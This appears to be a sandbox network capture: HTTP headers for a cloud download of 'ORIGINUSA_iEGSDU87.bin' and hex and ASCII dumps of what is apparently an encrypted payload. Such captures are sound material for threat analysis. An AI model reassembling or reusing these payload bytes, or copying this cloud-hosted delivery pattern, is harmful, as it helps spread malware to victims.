                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                        Access-Control-Allow-Methods: GET,OPTIONS
                                                                        Content-Type: application/octet-stream
                                                                        Content-Disposition: attachment;filename="ORIGINUSA_iEGSDU87.bin";filename*=UTF-8''ORIGINUSA_iEGSDU87.bin
                                                                        Date: Tue, 14 Sep 2021 16:41:16 GMT
                                                                        Expires: Tue, 14 Sep 2021 16:41:16 GMT
                                                                        Cache-Control: private, max-age=0
                                                                        X-Goog-Hash: crc32c=ZbELug==
                                                                        Content-Length: 221760
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Connection: close
                                                                        2021-09-14 16:41:17 UTC5INData Raw: 7d 77 29 7f 4a 10 60 ee ff 1f 35 b1 70 4b de c2 b1 4f cc 42 2e 2a ae ba eb 53 b9 db 51 98 e7 8c d2 ee 2b ad 81 48 e4 3c e7 c1 64 db c2 da 9f 1e 8a d7 69 21 35 a9 c2 2a ac a6 ea 76 d7 e4 7f 66 c8 9f 16 a7 4d b5 d8 a2 5c a4 4e 8b dd 0b 86 34 c5 34 9a 34 a6 83 3f 69 5d 91 7f 69 6b 5b 5f 7a 50 6f 8f ed 03 56 68 86 93 d2 7b 2a 9b 4f 8b a5 b5 32 6e fd 87 65 2a 68 a7 d6 90 2c 5b 2d 0a cd 7f 07 8a 10 12 a7 1a 0f d5 07 17 c1 ce 67 31 a6 da 80 f4 11 1f fa c5 bb 98 64 05 30 c4 a4 3d c5 4d 76 07 36 e4 37 76 1a 99 fe 52 19 6f e2 67 88 57 01 c9 b8 26 3d cc 9b 4c 57 d5 4f a9 f0 e9 67 41 5b 9e 2f e8 5a 4d bb f1 f5 dc a9 15 c2 26 4c c9 73 63 7b 0a 64 5a 6e a2 86 8c 48 ea 3c 91 da 0c c6 eb a9 24 3b ed 40 73 ca 52 41 10 b7 71 24 b9 e6 a6 12 41 eb 87 89 f4 69 43 2b 34 ec 84
                                                                        Data Ascii: }w)J`5pKOB.*SQ+H<di!5*vfM\N444?i]ik[_zPoVh{*O2ne*h,[-g1d0=Mv67vRogW&=LWOgA[/ZM&Lsc{dZnH<$;@sRAq$AiC+4
                                                                        2021-09-14 16:41:17 UTC9INData Raw: 29 cb ed 24 78 89 04 28 ba 55 11 5f 29 3f 44 c5 86 a7 5a b5 d8 b3 70 ef 4c 8b 24 dc cf 34 7d 3e ee 07 a6 83 3e 62 1a b9 35 69 6b 51 30 31 50 6f 85 ea 14 39 24 86 93 d8 7c 0a 8b 68 8b a5 da 7f 6e fd 8d 62 3d 07 e9 d6 90 26 dc 32 38 a2 3e 18 30 14 15 3b 5f c0 f4 b9 79 dd 03 46 6f c9 9b be d6 61 6b fa f3 c9 f9 03 22 3c f7 ca 53 a0 35 5e 11 69 c4 45 02 1b ea 97 3c 33 03 e3 36 a8 3c 78 85 f3 08 30 cb 87 5b 70 dd 20 fd f0 e9 6d 1c 17 ed 7a a4 5b 44 a8 3f 9a e7 a7 43 c2 26 46 da 76 72 7e e0 ba 68 66 85 81 8e 27 bd 64 92 d0 d0 10 e1 a1 08 3d e5 2f 0a bd 51 4b cc bf 5f 26 b9 e0 ac cc 53 c3 f0 89 f4 43 6b 05 36 ee 82 59 eb e7 f4 8f 9f 6e c4 9c 81 7e e0 83 e6 ca fe 99 90 3f 2d 79 7c 8c 63 2b 7c 6c e7 5b 2e 7b 07 d7 81 00 9c 3f b4 95 e8 75 2b ec 38 b4 98 20 b5 2e f3
                                                                        Data Ascii: )$x(U_)?DZpL$4}>>b5ikQ01Po9$|hnb=&28>0;_yFoak"<S5^iE<36<x0[p mz[D?C&Fvr~hf'd=/QK_&SCk6Yn~?-y|c+|l[.{?u+8 .
                                                                        2021-09-14 16:41:17 UTC12INData Raw: 7d 4e 68 86 97 70 64 23 88 4b 8b b4 b1 2d 67 03 86 49 26 61 bb fe e0 2e db 2b a8 d2 7b 0b 34 1e 03 17 0a 3c f5 93 1d 84 15 6e 08 cc b3 f5 76 7b 7e 91 a2 d8 fd 16 28 ad a4 e6 44 a3 26 5c 4d 57 c4 45 05 1b 23 97 3c 33 44 cc 34 a8 30 cc b2 d3 1b 34 c1 80 6c 48 db b1 a8 dc e4 6e 0e 15 e0 37 a4 5b 4a 19 24 84 f0 cc 15 d3 22 53 c5 8d 62 57 e7 6d 47 66 81 f6 85 48 ec c6 8d d7 1f ca eb b8 20 24 fb be 5c 91 5f 3f 0d 97 71 20 80 e1 a7 12 41 f4 d0 9a f0 49 52 2f 2b ff 7a 52 ef d2 fd 90 9b ce dc 9a ab 7a 42 9c f5 f1 fa 99 83 3b 4b 76 94 02 4f 2c 75 73 eb 73 5e 79 5e d1 61 84 8c 26 b0 95 f9 71 34 e6 c6 b5 19 81 bc 21 c1 10 b1 56 1f 46 64 28 4d 35 20 e9 c8 c2 4e 2b 39 66 ed 9e 6b 86 4d b3 1e 01 f4 40 d5 42 bf 94 f4 5b 8f 57 ca f3 be aa 16 26 5c 20 d7 4e 15 6c 6a 8a be
                                                                        Data Ascii: }Nhpd#K-gI&a.+{4<nv{~(D&\MWE#<3D404lHn7[J$"SbWmGfH $\_?q AIR/+zRzB;KvO,uss^y^a&q4!VFd(M5 N+9fkM@B[W&\ Nlj
                                                                        2021-09-14 16:41:17 UTC16INData Raw: ad ec d1 3e 25 53 af d9 4a 82 01 56 65 59 1a 45 12 7c 91 18 3d 39 2d d9 3a a8 3a 75 c2 1b 08 30 cb 4f 67 72 fd 78 a9 f0 e3 74 0b 36 a6 2f a4 51 90 bb 2a 83 cb 06 15 c2 20 23 0f 73 63 71 34 6b 7d 47 9e 87 87 42 f9 7f ba e2 0c ce e1 77 24 2a e5 68 b8 bd 51 47 7f 51 71 24 b3 38 a9 37 69 dc c7 89 fe 5a 5f 03 0c ee 84 59 1d df e5 87 bd 7c c4 9a ad 11 26 83 e7 e8 20 96 b7 17 63 79 6a 09 70 3c 54 54 e7 5b 26 a5 5e c6 cb b3 89 34 b4 93 87 b3 2b ec 32 6a 39 a5 82 3c e9 3c 99 6e 15 e4 71 fd 5e 20 28 d0 38 de b0 2c 7a ab e4 87 49 37 40 96 30 94 e9 53 db 51 b0 b8 d1 a5 8e 71 1f fa b5 8a 1b e5 5c 2a 73 3f c0 68 6a 91 64 71 bf 68 89 b6 ea 17 3c ab d8 0b c8 13 0f 7b 25 b4 73 21 20 6b 37 bc fb de 3f a2 f9 34 e0 04 99 76 a0 b5 65 86 1e 04 cd 99 84 13 5e ad 02 3b 4d 4a 6d
                                                                        Data Ascii: >%SJVeYE|=9-::u0Ogrxt6/Q* #scq4k}GBw$*hQGQq$87iZ_Y|& cyjp<TT[&^4+2j9<<nq^ (8,zI7@0SQq\*s?hjdqh<{%s! k7?4ve^;MJm
                                                                        2021-09-14 16:41:17 UTC18INData Raw: 16 04 f5 99 82 08 87 c2 c1 33 65 44 44 81 74 42 0d d6 ae 14 9f 3c 7a 88 2a 56 91 7e 6e 35 0f 86 eb 7e 5d 58 fc c3 ca 4d 42 67 a6 dc 8e e2 67 c7 7a 1b 59 ff a5 7f 55 71 ba 19 02 9b 81 c1 9f 14 ca d1 ea b9 46 36 1a 14 81 db e9 8c 9a c6 08 2c 1d d1 b9 f7 3d ca cf 00 88 c2 cd 38 d9 66 91 44 c7 1f c3 cb 5c 8e 8d 34 c9 96 5a ec 4d 33 e9 37 44 08 b0 a6 05 ef e9 69 32 28 97 15 d2 23 f5 cc 73 4f 31 81 69 31 13 72 32 a0 5b bc 3b 31 bc e4 ce 87 66 ed 29 24 b9 96 9a 00 fa 43 48 ac 0d 89 f3 87 e5 43 29 be 5c 5f ba f9 6c 4d f3 8e 60 87 f9 3a 64 8c 11 e6 ff b5 82 81 ed 04 55 8f 9d 31 f9 a1 63 d0 43 0c a1 28 b7 1a b5 e0 80 7b fa 17 c7 46 e1 28 ae ab 1a 69 e2 61 47 99 14 68 84 ca 07 56 e6 d3 dd 6d 5e 73 e0 53 53 61 41 e8 d6 32 99 2e a1 52 ad e7 d0 72 d3 fe fc 09 d4 d3 30
                                                                        Data Ascii: 3eDDtB<z*V~n5~]XMBggzYUqF6,=8fD\4ZM37Di2(#sO1i1r2[;1f)$CHC)\_lM`:dU1cC({F(iaGhVm^sSSaA2.Rr0
                                                                        2021-09-14 16:41:17 UTC19INData Raw: d8 1e 95 56 5f 21 bf 11 10 13 e3 ff 23 9d 3f 86 2b a3 49 5c f1 32 fb d9 b2 80 2d 0c 8e 89 65 03 c5 f2 ca e3 2b e6 ba 75 4d 4a 42 79 ce 8e c9 74 f0 26 ed 50 25 42 83 38 f9 05 b2 f7 7f 12 21 2e ce 6e 0e b7 1e 62 f4 25 74 b9 45 11 f2 42 25 b4 5d 46 e9 6f af 0c 03 85 f7 60 6e 13 c3 de c7 a5 f2 83 12 20 e6 da 28 b3 63 e7 77 c9 92 5a 00 a8 84 c5 9c 14 df 91 cd 4f 5f 18 84 6c 29 cd 63 38 78 89 c4 08 ba 55 06 6f 2a 3f 9f c5 86 a6 4e b5 d8 a2 ac ae 4e 8b 51 f5 86 34 1a 38 9a 34 a9 83 3f 69 07 91 7f 68 69 5b 5f 7a 8d 65 8f ed a4 57 68 86 17 de 7b 2a 95 4f 8b a5 b5 32 6e fd 87 65 2a 68 0b da 90 2c f3 2d 0a cd a5 14 30 1e 07 13 13 c2 ee bf 16 8c 03 46 65 ce 47 ff d4 61 e0 95 a2 c9 78 04 25 53 aa ca 53 aa 23 56 65 52 c4 45 03 74 21 9a 3c 39 4c ad 34 a8 c5 63 ad dd 07
                                                                        Data Ascii: V_!#?+I\2-e+uMJByt&P%B8!.nb%tEB%]Fo`n (cwZO_l)c8xUo*?NNQ484?ihi[_zeWh{*O2ne*h,-0FeGax%SS#VeREt!<9L4c
                                                                        2021-09-14 16:41:17 UTC20INData Raw: 23 64 52 8a af f9 60 7d 4d b6 76 93 ce 09 84 6c 0b 05 af c0 37 c8 94 07 a5 25 8d 7b 09 d0 43 ee b8 94 1e 35 d1 2d eb ef 27 a2 46 de af 6f 95 3a 00 a4 88 83 67 9b ad 13 37 0a ae 6d 51 70 54 f5 ff fe 0d 9f 3a 11 e6 d4 57 fb 7a 36 26 08 ef 22 03 5d 5e e7 ec 8b ae 43 61 7d 40 89 ca bd ed 4d 1d 48 f2 ca 4b 53 59 86 31 d9 93 5f b9 c9 3d ca d1 e4 cf 97 41 32 85 01 c0 e3 a4 b6 d7 0f 45 d3 d7 d6 23 22 c3 48 3d ac c2 cc 21 a6 ef 81 52 cf 49 25 cb 5c 80 07 60 db 81 5a 66 0b 21 f1 4f 3f 70 b0 a2 ad d6 a3 72 34 8c ae 7c c8 0b 86 df 31 57 60 a6 20 3c 6d 61 1a da 5f 94 4b 19 da ec 6c 90 5e 8a 2f 86 a2 ae 46 7c ed 45 60 81 af 98 e5 b2 89 e3 38 a8 6a 26 18 e8 7a bb 87 a6 57 8d f5 36 03 e3 16 ce c1 a6 84 a3 ef 06 41 9a 8b 49 ff ce e3 d4 55 39 a7 17 9f 71 bd ec ae 8e 3b 15
                                                                        Data Ascii: #dR`}Mvl7%{C5-'Fo:g7mQpT:Wz6&"]^Ca}@MHKSY1_=A2E#"H=!RI%\`Zf!O?pr4|1W` <ma_Kl^/F|E`8j&zW6AIU9q;
                                                                        2021-09-14 16:41:17 UTC22INData Raw: 4a 4b ff 50 fa e5 4d d3 29 50 12 44 a3 3a be 30 10 3b e6 85 02 29 c8 59 59 86 32 4f 6a a0 37 af b9 47 18 c0 7d ef e3 e6 6b 0b 52 8e 57 8b 56 08 62 bd 5c 5e 09 a5 11 10 19 fd f5 22 9d 39 ea 70 8b c2 5c f1 39 4c ca b4 96 7e 00 9d 80 78 04 ee c9 ba e9 2f e6 b5 06 4f 4b 58 73 dd 87 d8 70 9f 27 b3 5a 2f 4b 9c 3f 6c 6b f7 fe 7e 12 24 3f c6 7f 1c d8 1a 62 f4 2f 5c fb 39 1b f4 64 3a bc 32 94 63 65 a5 06 24 bd f7 60 7e cd cc ce c0 b4 fb b2 34 02 de da 26 b9 bd e7 c4 e9 94 70 0f a9 94 c5 86 14 df 90 cd 59 49 18 83 7c 29 cd 6c 23 48 8d 00 92 ba 55 0a 44 2a 3f 94 ed a8 a5 4e b3 d3 dc 7a a4 4e 8f 0a 0b 86 34 77 5b f7 34 a6 89 33 17 3f 91 7f 6d 43 1d 5f 7a 56 47 8a ec 03 5c 07 80 92 d2 71 27 92 5b 75 a4 a3 cc 6f f4 af 4b 28 68 a1 c0 b8 02 db 2d 00 db 8f 19 26 e0 13 73
                                                                        Data Ascii: JKPM)PD:0;)YY2Oj7G}kRWVb\^"9p\9L~x/OKXsp'Z/K?lk~$?b/\9d:2ce$`~4&pYI|)l#HUD*?NzN4w[43?mC_zVG\q'[uoK(h-&s
                                                                        2021-09-14 16:41:17 UTC23INData Raw: e5 e7 32 8d b5 17 f7 48 92 56 15 e0 63 10 48 4f 05 f8 cc da 3e 9d 03 5c e8 af 08 e9 4f b5 35 a6 34 60 d6 42 ae b8 a0 a5 8e 7d c3 e4 e4 69 33 26 5c 54 78 50 06 6c 42 74 b8 7e 9c 68 fe b6 ea 17 1c ad 8e 3b c8 13 01 8d d5 a7 7b 0f e9 4f 37 ba 9e 98 37 a2 f3 ee 32 dc b7 41 a0 cb 67 95 3e 28 dd b7 86 19 86 bb 3b 1d 65 4e 66 47 4d e4 0b fe 80 68 97 3a 15 f4 54 5e 9b 56 02 58 c6 80 c3 08 23 70 f6 eb e0 22 8b 61 7b 5b 54 9c 4f ef 4d 1f 36 3c b1 6c 58 36 6d 19 02 9b 21 97 e1 1a ce c7 c6 8e 75 40 38 95 af b4 9d ac b2 c6 0c 54 04 d6 d6 21 52 03 c5 28 a6 df 17 5d be ff 91 4e c7 67 fc 3a 5e 8a a3 67 e3 b8 5c c4 10 27 17 30 3d 8e b1 d8 07 c7 b3 6f 4c 26 bf 6c d6 4c 36 df 31 57 69 73 5d 3b 12 74 10 a4 43 bc 31 1d cc ce e0 81 4e 9b 3f da b2 a8 a4 03 a5 69 7c fb 05 89 f5
                                                                        Data Ascii: 2HVcHO>\O54`B}i3&\TxPlBt~h;{O772Ag>(;eNfGMh:T^VX#p"a{[TOM6<lX6m!u@8T!R(]Ng:^g\'0=oL&lL61Wis];tC1N?i|
                                                                        2021-09-14 16:41:17 UTC24INData Raw: 64 91 43 68 ab 40 79 49 8b 03 58 48 a7 94 ff a1 dd cf 6a e4 22 42 3e da 11 4f 02 ba 88 37 cb 06 79 74 da 67 13 3b 87 80 df 20 0b e3 64 d5 52 21 44 a3 53 fa e5 4d 94 31 51 12 44 e4 3d be 30 10 1a 78 31 da 97 b4 c1 4f 8d 29 67 10 a3 ba d0 b3 4e 08 aa 63 ef cb ad eb 2c 54 a8 54 20 e5 d9 1e bd 22 57 21 b1 15 38 02 d6 f5 25 b5 17 86 2b a9 d3 54 f1 33 ff a7 ba 80 6f 02 8c 05 14 03 c5 f3 f5 e5 2a e6 bf 5d 69 4a 58 73 4e 87 c9 74 f4 32 32 7d 25 42 89 e5 5f 04 df fd 7d aa 06 63 ce 6e 12 9f fd 61 f4 23 62 91 17 1b f2 48 3d 87 44 38 6b 65 af 08 24 61 f5 60 72 3b e7 df c7 af 72 8b 8b 2a e2 e2 4e b2 63 e7 d2 7b ba 17 0f a8 82 ed 63 16 df 96 db 67 71 18 32 6c 3f fe 74 46 70 89 00 06 92 b3 08 6f 2c 17 a1 c5 86 ad ce bd d8 a2 5c 9c 74 8a 22 f4 84 8c 55 79 9a 34 a0 ab d8
                                                                        Data Ascii: dCh@yIXHj"B>O7ytg; dR!DSM1QD=0x1O)gNc,TT "W!8%+T3o*]iJXsNt22}%B_}cna#bH=D8ke$a`r;r*Nc{cgq2l?tFpo,\t"Uy4
                                                                        2021-09-14 16:41:17 UTC26INData Raw: 00 34 ee 85 40 c6 c0 c5 9c 8e b0 d5 81 b4 6a 1e 82 cb ef fc 88 99 17 42 78 6a 09 6f 3e 69 7f fc 5b 3d 60 41 fa 3d 9a b0 3e a5 9e f9 6d fd ff 33 ab 1b 9e ae 3c f8 2d ae 61 eb e5 57 3f 4f 34 08 ef cd de ba 02 42 6f e4 81 6b b3 4d b3 1e cc 91 53 d1 48 bd 8a f6 9d 9d 60 c1 eb bf 9d 3d d8 5d 06 7f 41 0d 72 bc 88 b1 61 95 53 a5 b6 fb 06 30 8d 0e 32 e4 19 76 87 27 a5 7d 03 de 51 24 a1 94 09 24 bd d1 14 ee 0d bf 43 b1 be 47 81 3f 2c ff 8a 80 06 a3 be 08 33 74 55 73 58 88 43 27 f0 82 07 94 12 03 f1 2a 5c 88 47 19 3d 1c 9b c3 13 46 47 eb 15 e5 61 49 70 70 40 9e 34 74 e4 52 05 4a ee b1 7d 49 46 bc e7 03 bd 53 bc b1 1c a5 c9 ef a0 7f 5f 0d 90 9a db f2 bf ad e1 f6 2b 20 dc c7 2e 27 1c d6 23 b3 ea de 29 b6 ef 8a 5b eb 9f d5 e7 52 88 b4 7a e3 82 5d c4 10 22 fc 2e 0c 63
                                                                        Data Ascii: 4@jBxjo>i[=`A=>m3<-aW?O4BokMSH`=]AraS02v'}Q$$CG?,3tUsXC'*\G=FGaIpp@4tRJ}IFS_+ .'#)[Rz]".c
                                                                        2021-09-14 16:41:17 UTC27INData Raw: 96 d6 57 61 01 65 b9 8f 7f bd ab d0 65 40 aa 7c 6a f4 82 b2 6d d0 1d 36 73 4d 9d a4 45 7b 9f 3b 1d 3c 17 a2 80 98 c8 96 42 70 4f f4 cc 68 2b 6d 9a 6b 42 c5 4a 72 4d a9 02 a5 49 fe f9 f9 b2 23 c4 50 08 32 19 2d e9 b3 57 2a eb 76 36 db eb 7f f6 72 47 b6 3b 96 84 30 32 1b 04 4d db 7e 4b 40 3c 2b 27 7d 4c fb 3d 78 25 4e 8b 30 97 08 1a 32 62 ef 58 91 db 5c 47 ad 27 cb 05 a1 05 d5 b0 5f 05 aa 72 ef cb ad 04 15 55 a8 5a d5 68 d8 1e bb 4f 48 30 a6 00 00 1b fd a5 23 9d 35 95 3e a4 3f 7f f1 33 fb d9 b2 80 4f 46 d5 aa 6b 03 c5 f2 9a e9 db d9 ec 5d dc 4a 58 73 79 98 1f f9 db 26 b2 5b 36 54 9c 2d e8 13 d8 91 5c 12 2e 2e ce 6e 14 97 5e 38 dc 3a 75 b9 33 33 d2 43 2b be 4c 42 72 73 a9 15 24 d4 f7 60 72 00 c4 01 d4 8d c5 83 8b 20 ce e2 26 b3 69 39 d0 d5 1f 71 0f a8 85 ef
                                                                        Data Ascii: Waee@|jm6sME{;<BpOh+mkBJrMI#P2-W*v6rG;02M~K@<+'}L=x%N02bX\G'_rUZhOH0#5>?3OFk]JXsy&[6T-\..n^8:u33C+LBrs$`r &i9q
                                                                        2021-09-14 16:41:17 UTC28INData Raw: 0f c1 26 4a de fe 64 7b ea 65 4b 63 b8 8b 91 59 ef 4c 83 da 0c c4 49 b8 28 28 e6 51 56 a9 45 56 9d b8 71 24 b8 f5 ab 03 4c fd d0 15 e5 44 6b 88 34 ee 8e 42 ce c9 64 a3 9e a1 cf 8c 31 56 f1 83 e7 e8 ed 9c e6 2d 54 79 71 0e bd 2d 6d 64 cb 5c 3d 73 31 80 c3 9b 96 e9 bd 84 ef 5d 7e ec 38 b2 3e 84 c6 1f e8 36 bb 45 1c f5 72 32 59 5e 02 f9 cc d4 bc f4 19 7c ed ab 44 f8 46 dc 4f a3 e9 59 0d 4a 84 90 e9 a5 8f 67 c1 fa a6 82 dd 26 0c 14 74 5c 06 68 6a 9b b8 7e c1 41 b2 d1 eb 11 2f b4 f0 33 db 23 00 a5 4c a5 7b 09 f9 6b 37 ab 82 14 14 c3 f3 e2 f6 df b0 6d ae b7 79 92 28 2e 7b 2e ac 2c 81 ad 19 29 69 4e 64 49 88 43 27 ed 82 98 28 39 9b 47 fc 41 41 41 d0 ba 24 80 c3 03 56 41 fa eb ec 57 bc 60 57 41 8d f4 60 ed c3 ac 5a 7b 06 44 67 58 82 13 19 9d 5f b7 f6 e4 cb fd ec
                                                                        Data Ascii: &Jd{eKcYLI((QVEVq$LDk4Bd1V-Tyq-md\=s1]~8>6Er2Y^|DFOYJg&t\hj~A/3#L{k7my(.{.,)iNdIC'(9GAAA$VAW`WA`Z{DgX_
                                                                        2021-09-14 16:41:17 UTC29INData Raw: 51 ff 69 53 6b 54 e7 ef 0f f6 fa ab 8c a7 f1 f2 1b 37 bf 80 03 c2 e0 30 44 13 a9 c6 f8 7d 34 61 0d b1 42 96 dd ac e3 cc c9 92 53 7f 32 83 cc b6 96 0c b5 01 65 b9 ae 7f bd 5b f7 3d 68 3b 6d 6a fe 35 a5 bb 5d 36 34 73 4c 8e b0 56 69 8e dd 1a 50 34 5e 82 98 c8 9a 42 50 0f af e4 77 2a 6f 90 43 62 6e 49 78 49 ae 15 a6 49 21 95 e0 b3 2f ce 7c 1a 23 1d 3c fa b5 4f 02 ba 70 36 dd f8 93 28 d8 47 47 38 87 80 2e 21 1d 1d 7f 8a 7e 4a 55 1f 29 fa 6a 4c fb 3d 6a 12 4e 9a 2c ac 34 22 b2 68 32 da 91 ca 58 58 73 22 67 06 b9 25 ab b3 5f 0d dd 91 ef e7 a1 74 6b 59 b1 43 f9 3a c9 1a a7 a2 5e 0d b9 18 0f 33 03 f8 38 8e 37 86 3a a7 48 a2 f0 1f eb de a5 ea b5 b1 99 5f e6 28 c5 f2 9b e5 37 f5 b1 75 5c 4e 41 87 cf a3 c2 76 f9 0e 89 5b 25 48 86 22 ea 01 df ec 7b 0e d0 2f e2 61 16
                                                                        Data Ascii: QiSkT70D}4aBS2e[=h;mj5]64sLViP4^BPw*oCbnIxII!/|#<Op6(GG8.!~JU)jL=jN,4"h2XXs"g%_tkYC:^387:H_(7u\NAv[%H"{/a
                                                                        2021-09-14 16:41:17 UTC31INData Raw: db 5c b5 32 a8 64 7f c9 5a 13 f9 92 97 3c 38 38 a4 2b a4 29 61 ad cc 07 2f c8 6f 69 7b f6 5e a2 e8 73 4f 00 1e 9e 25 74 49 4e bb 20 a3 f7 c8 15 c8 0e 78 c8 73 69 0f f8 64 58 74 ba 80 98 42 f9 6b 92 cb 03 d4 15 a8 08 37 f2 50 d0 96 51 41 11 84 76 3f aa e9 a6 03 4e f5 39 88 d8 44 52 27 2c 7e bd ad 38 20 0b 90 9c a3 cb 9a ba 71 f6 7d e6 ce fd 8e 81 30 54 68 65 1c 7f df 7d 40 e5 70 29 43 ff 2c 3c 64 9a 41 91 95 e8 77 01 ec 38 af 05 85 b5 6c e9 36 b1 6a 15 e4 6a 0b 43 32 20 fe e4 16 b0 2a 1f 45 fa 84 43 ef 67 97 18 a3 e3 5e c3 41 ba 83 ed b7 8a 6d d3 fb b2 91 36 34 59 3c 66 56 14 6e 7e 88 bd 6c 9d 56 96 ec ea 1d 29 92 f7 1b 89 12 05 af 2f 7b 6b 2c e9 5c 37 ba 9e 14 2b a8 db d2 ef 21 bb 9f a0 b3 45 94 2e 2c f5 99 84 19 80 93 2d 33 75 54 6c 51 77 59 3b fd 80 9c
                                                                        Data Ascii: \2dZ<88+)a/oi{^sO%tIN xsidXtBk7PQAv?N9DR',~8 q}0The}@p)C,<dAw8l6jjC2 *ECg^Am64Y<fVn~lV)/{k,\7+!E.,-3uTlQwY;
                                                                        2021-09-14 16:41:17 UTC32INData Raw: 83 8b 39 1c 72 bf 8d 65 ec ad 63 dc 4c c1 8e 1f 9b 68 9d fa 8a 53 31 03 39 41 dc 2f d6 74 1a 61 f3 b7 8d b5 16 49 ae 8d b4 4c ca fb fa 6d 45 49 ca 69 65 61 47 ce c7 37 f6 fa a3 7f a6 dc da 72 e4 fe fc 09 ee f7 32 53 7c e7 c6 f8 77 cb 6d 25 86 97 96 d7 84 ca cc c9 98 8d 7f 30 ec 35 b6 96 06 9c 0d 4d 8e 8f 7f b7 73 d7 3c 68 31 a2 6a d4 35 a5 ba 41 36 36 73 4c 82 b7 5d 7c 8e 24 00 50 34 a3 80 98 e9 96 4a 79 0f a3 fe 77 2a 6c 8b 73 60 c4 6d 78 49 81 15 a6 49 f8 94 cd b2 09 cc 68 75 6c 1c 3c f0 b7 5b 6d ea 77 36 d7 fa 17 7a d9 47 bc e5 8b a8 16 21 1d 17 4d b2 7e 4b 4c f1 2c d0 e5 4d eb 3d 50 12 4e 8f 3a a9 2a 1a 3e 72 32 da 90 c0 6c 4a 8d f2 4a 05 a1 73 af b3 5f 0b c0 14 0f cb a7 6f 23 22 a8 50 fb 55 8a 1f bd 56 79 01 4e 11 10 13 58 de 23 9d 32 8a 29 ab 3c 0f
                                                                        Data Ascii: 9recLhS19A/taILmEIieaG7r2S|wm%05Ms<h1j5A66sL]|$P4Jyw*ls`mxIIhul<[mw6zG!M~KL,M=PN:*>r2lJJs_o#"PUVyNX#2)<
                                                                        2021-09-14 16:41:17 UTC33INData Raw: 3c 8d a0 33 6e f7 81 7d 23 e6 10 00 98 a2 6c 99 96 c5 67 1e 29 17 9c a4 c5 ca 7a 08 3e 98 02 46 6f c8 99 ed d6 49 7e a5 ab c9 cf 08 25 53 ec ca 53 bb 2f 45 61 6b ec 44 03 74 b9 86 38 25 d5 ac 18 91 3c 7a 85 fb 0b 30 c7 89 e5 50 d5 4f a8 fb ee 71 39 37 9d 2f a2 f9 49 ac 3f 29 e4 c4 1d d6 32 54 44 5c 63 7b eb 69 51 79 bf 1b 8e 5f fd f8 9b cd 24 69 eb a9 2e 1d f0 53 59 bd 40 45 07 69 70 08 ba fe b5 16 41 fa c3 96 fd b7 42 07 28 c6 ae 50 c3 d9 f7 8d bd 9b c7 9a ad 7b e6 f7 7a e2 fe 98 ba 44 54 79 6c 1c 69 32 78 6c f6 5f 34 85 5f fb cf 99 12 82 a2 a8 6f 75 2b ec 21 a7 31 8d a4 38 f4 c8 b0 7a 1d ed 6c b3 72 f2 3e eb c8 de a1 2e 0b 93 e5 ab 67 e1 58 29 30 b2 e9 53 db 92 bb 90 e9 a4 a6 6f c1 fa ae aa 07 27 5c 20 01 45 06 68 6b 65 b1 7c 9a 5f b7 a5 ee 1d 3e b0 e9
                                                                        Data Ascii: <3n}#lg)z>FoI~%SS/EakDt8%<z0POq97/I?)2TD\c{iQy_$i.SY@EipAB(P{zDTyli2xl_4_ou+!18zlr>.gX)0So'\ Ehke|_>
